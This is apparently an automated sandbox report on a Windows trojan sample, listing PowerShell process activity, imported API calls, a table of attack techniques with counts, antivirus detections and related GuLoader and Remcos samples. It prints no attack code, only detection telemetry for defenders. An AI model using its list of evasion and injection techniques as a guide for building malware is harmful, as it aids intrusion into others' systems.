Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe Code function: 0_2_004033D8 EntryPoint, SetErrorMode, GetVersionExA, GetVersionExA, GetVersionExA, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, ExitProcess, OleUninitialize, ExitProcess, lstrlenA, wsprintfA, GetFileAttributesA, DeleteFileA, SetCurrentDirectoryA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
MITRE ATT&CK matrix (numbers in parentheses are the report's per-technique counts; cells without a number are the matrix template):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (21) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (11) | OS Credential Dumping | Security Software Discovery (11) | Remote Services | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1) |
| Credentials | Domains | Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Process Injection (111) | Virtualization/Sandbox Evasion (31) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Clipboard Data (1) | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | PowerShell (1) | Logon Script (Windows) | DLL Side-Loading (1) | Access Token Manipulation (1) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (111) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | File and Directory Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery (34) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| MPkM9Dd99B.exe | 65% | Virustotal | | Browse |
| MPkM9Dd99B.exe | 70% | ReversingLabs | Win32.Trojan.Leonem | |
| MPkM9Dd99B.exe | 100% | Avira | HEUR/AGEN.1331786 | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | 0% | Virustotal | | Browse |

No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high |
| default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.57.20 | true | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nsis.sf.net/NSIS_Error | MPkM9Dd99B.exe | false | | high |
| http://nsis.sf.net/NSIS_ErrorError | MPkM9Dd99B.exe | false | | high |

No contacted IP infos
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1589010
          Start date and time:2025-01-11 08:20:53 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 46s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:42
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:MPkM9Dd99B.exe
          renamed because original name is a hash value
          Original Sample Name:8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0.exe
          Detection:MAL
          Classification:mal76.evad.winEXE@4491/22@0/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 47
          • Number of non-executed functions: 25
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240s for powershell
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 217.20.57.20, 20.242.39.171, 13.107.246.45
          • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
02:21:53 | API Interceptor | 1486x Sleep call for process: powershell.exe modified
02:22:09 | API Interceptor | 2x Sleep call for process: SIHClient.exe modified
          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
bg.microsoft.map.fastly.net | 71621480653828912.js | Get hash | malicious | Strela Downloader | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 3129912127106722813.js | Get hash | malicious | Strela Downloader | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | 1505131979137938490.js | Get hash | malicious | Strela Downloader | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 3000822141700718957.js | Get hash | malicious | Strela Downloader | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 700123582683323683.js | Get hash | malicious | Strela Downloader | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | 3274215974163975076.js | Get hash | malicious | Strela Downloader | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | 326794322661816170.js | Get hash | malicious | Strela Downloader | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | 2948124376300195806.js | Get hash | malicious | Strela Downloader | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 1264213928938610773.js | Get hash | malicious | Strela Downloader | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 2iH7rqx9rQ.exe | Get hash | malicious | Remcos | Browse | 199.232.214.172
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 3274215974163975076.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.36
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Yv24LkKBY6.exe | Get hash | malicious | Unknown | Browse | 217.20.57.20
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 2iH7rqx9rQ.exe | Get hash | malicious | Remcos | Browse | 217.20.57.36
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 369248682699819312.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.36
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 11626244731900027402.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.21
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 1554336511338510086.js | Get hash | malicious | Strela Downloader | Browse | 84.201.210.37
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 3107622714995924320.js | Get hash | malicious | Strela Downloader | Browse | 84.201.210.23
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 709291801716322197.js | Get hash | malicious | Strela Downloader | Browse | 84.201.210.23
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 244312574730704684.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.18
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 12071652839003777.js | Get hash | malicious | Strela Downloader | Browse | 217.20.57.20
          No context
          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | RzEqKuZBuK.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | RzEqKuZBuK.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | vfhlZ0vrbe.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | vfhlZ0vrbe.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | HJEbEB40vP.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | HJEbEB40vP.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | 004552024107.bat.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | Order 00293884800595.bat.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll | 004552024107.bat.exe | Get hash | malicious | GuLoader | Browse |
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):4761
                              Entropy (8bit):7.945585251880973
                              Encrypted:false
                              SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                              MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                              SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                              SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                              SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                              Malicious:false
